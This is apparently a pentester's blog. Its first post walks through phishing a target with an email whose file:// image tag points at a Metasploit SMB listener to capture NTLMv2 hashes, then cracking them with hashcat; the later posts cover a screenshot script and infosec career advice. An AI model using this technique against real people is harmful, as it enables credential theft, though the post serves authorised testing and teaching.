If it’s closed, this probably isn’t going to work. If there is no access to test that, we’re flying blind and just hoping here.
Set up a listener on metasploit, I like auxiliary/server/capture/smb because it’s just so easy. Nothing to configure. Just “use” it and run.
Next, create an email for the target. In the email, include an html image tag and use file:// for the scheme. Point it to the metasploit server, and reference some non-existent image. Example: <img src=”file://192.168.1.10/image.jpg” /> This will create a broken image icon in the email, but when the user attempts to load from a Windows machine, the user’s NTLMv2 hash will be sent to the listener.
If you want to also craft a believable phishing email, you could also put a link to a web page that you control and on that web page, also include the same image tag. This is just in case the user’s mail client doesn’t allow downloading of images. But a browser will!
Once hash(es) are captured, shut down the listener and while still in metasploit, enter: creds
This will give the hashes in a format that a password cracker like hashcat will understand. For hashcat, use -m5600 for the NTLMv2 format. Also, ensure there is no extra whitespace around the hashes when loaded into hashcat, or there will be a string length exception.
Run the cracker and pray. If it cracks, congrats! If not in the time allotted, sorry!
Each week, I create a new directory for the test. It’s where I store notes, reports, artifacts, etc. I also create a screenshot directory and then set my system to auto-save screenshots to there. So I bash scripted it up. Here’s the script that will automatically create the new directory, the screenshot directory and tell my Mac system to save screenshots there:
if [ “$1” == “” ]
echo “Usage: ./myscreens.sh [dirname]”
defaults write com.apple.screencapture location ~/Desktop/$1/screens
A couple posts down, I was parsing the nslookup command to get hostnames. Even easier, use the host command. The hostname seems to be the fifth string after spaces, so using cut, it might look something like:
host <ip> | cut -d " " -f5
But there will be a period at the end, so just clean that up. Next is to get the IP and the hostname in some easy format, like colon or pipe delimited.
I got a job as a penetration tester, which I think is really exciting. It is a job that I get excited about. One that causes frustration and a feeling of accomplishment. I’ll officially start on April 11th. My plan is to track my progress here, and document things that I learn, in general.
I contacted some other friends who are pentesters and asked for their advice, ideas on things they wish they knew when they got started. I was given two great pieces of advice on things to read or study up on. One was to read the publications on GitHub from Cure53. Today I read their whitepaper on X-Frame-Options and various ways to still bypass the clickjacking protection it provides. I’m looking forward to reading the others, once I finish the other recommendation…The Tangled Web! Continue reading →
This in no way reflects my current management, it’s more thoughts of managers past and managers of other friends.
I’m surprised that more businesses and employers don’t always understand the true value of a good manager. I think often the thought is on how well the manager can do their own tasks and don’t see the true value of management and leadership. A management position is sometimes seen as just a logical career progression, and not thought of as a true skill, like many others. I have seen where a bad manager can be put in charge of a number of good employees, and the good employees end up either leaving the job or becoming stale, and then sometimes the manager also leaves the job. Then I think of the good employees who have left and would have still been an asset to the company if not for that bad manager.
A good manager can fix bad employees and make good ones better. A bad manager cannot fix bad employees and will likely make good ones bad, or make them leave.
How do you get started in infosec? It’s a question that gets asked a lot and there’s often a talk about it at every conference. Someone’s got advice on how they got started and how it could help someone else. Heck, I even did one myself at BSides Rhode Island (link).
I organize my local OWASP chapter in Rhode Island and I get speakers each month on the various web application security topics. In August 2012, I had a friend in the profession, Paul “pauldotcom” Asadoorian come speak at the monthly meeting. During the normal course of conversation, I mentioned to Paul how that I was trying to make a full conversion from an application developer to a web application security professional. I’d been to a couple SANS classes, I attend conferences when I can and I tinker on the side trying to learn. However, without a mentor or having someone nearby to bounce ideas off of or ask questions or push me to learn new things. How do you learn when you don’t know *what* to learn?
I had also been tinkering with an idea with my employer to create a “staff sabbatical” where professional staff could go off and do some hands-on learning for a period of time. My suggestion was the equivalent of three months, full time. That could be spread out over a longer period or just go do it, cold-turkey and then return to the job. I told Paul that if I got my employer to agree to this kind of arrangement that I’d then be looking for a company to mentor with. Paul immediately perked right up, “How about with me!” I thought the idea was perfect. I brought the idea to my employer and they agreed, but it would only be for the equivalent of two months. I would work with Paul for 2-3 days a week and keep track of the days. I’d work for 30 days as an intern to Paul but then another 10 days, I would still work with Paul but I had to work on something related to web security for my employer. Done deal.
I started with at beginning of the new year, 2013.
On day one, Paul gave me my first two assignments. One was to “learn everything about CSRF (cross-site request forgery), build a demo and create a presentation for the PaulDotCom Security Weekly podcast.”
The second was to catalog every show he had ever done, into a wiki, specifically the technical segments and the guest interviews. At that point, he had done about 315 episodes. With not really knowing what CSRF was exactly and with that much grunt work ahead, I knew I’d be busy. But I’d learn a lot.
I alternated between the tasks as I thought the cataloging would be pretty mindless. Just going through the show notes, finding the guest interviewed, finding a copy of the video, if that was available and making a new entry in the wiki. In addition for each show that had a technical segment, I’d make an entry in the wiki for the person doing the segment, the topic and link to the video and slides, if those were available. As I started going through the interviews and especially the technical segments, I was amazed at how much was there. It seemed the show had talked to every well-respected expert in the field and it also seemed every topic had a technical segment on it done as well. Instead of simply cataloging all the segments, I started watching them. And learning! That wiki is an amazing treasure trove of information.
It didn’t take long to complete the catalog and dig deep into CSRF. First figuring out how it works, then setting up and playing with a vulnerable app (I chose a 5+ year old version of Drupal, 4.7.0) and then start writing my own attack for it. I got to figure out how it worked from trial and error and got to do the happy dance when it did. I wrote it up and presented a “CSRF Primer” for the podcast.
When I was looking for my next task, I would watch Twitter for various tips and came across Adrian Crenshaw’s Irongeek web site. It contains videos from the many conferences, meetups and training sessions that he has attended. I watched a video by Jeremy Druin, on sqlmap and saw just how easy it is to use. From there, I started simply digging into the various switches/flags that can be used with it and decided to dig deep into one of those.
Rinse, lather repeat.
My interest is mainly in application security. So I use the OWASP Top 10 as my checklist. Try to become proficient at one and then move on to the next. I also have a philosophy of learning that it helps to “learn, do, teach.” Each time I learn something new and think I have a solid understanding of it, I look for an opportunity to present it to someone else or a group. A local OWASP meeting group is great for this as meeting organizers are always looking for presenters.
What I’ve tried to do here is just explain one experience toward getting started in the field of infosec. Because in the end, it worked. I did make the full conversion from a programmer to being offered a job on a major technology company’s incident response team, focusing on web application attacks. It was everything I’d been working toward for years.
If you’re looking to get started in infosec or looking for advice to give others, some of the best that I got included to do it yourself, start a blog and focus. I hear people say they want to “do security stuff” but it’s not in their job description. I tell them to do it at home, at night, in their own labs. If it’s something you really want to do, you’ll find a way to make this happen. Then as you’re learning, document it all in a blog. This helps you to really think things through and may point out holes in your understanding, and serve as a place for you to go back months later when confronting a similar situation. Even better, when you’re looking for a job you can point them to your blog to show the work you’ve done. Lastly, people think they want to simply “work in security.” That’s great but it’s also like saying you want to be a doctor. When someone says they’re a doctor, usually the next question is what they specialize in. It’s the same thing with infosec. The field is way too big to know about everything. So specialize. Figure out what you like and what you want to be an expert on. Don’t get distracted by shiny objects in other areas outside of your interest.
That’s about it. If you want to get into the field, just do it, and even better if you can find a way to do an internship with a security company. Do everything they want you to do, even if it isn’t exactly what you’re interested in, as you never know where it could lead.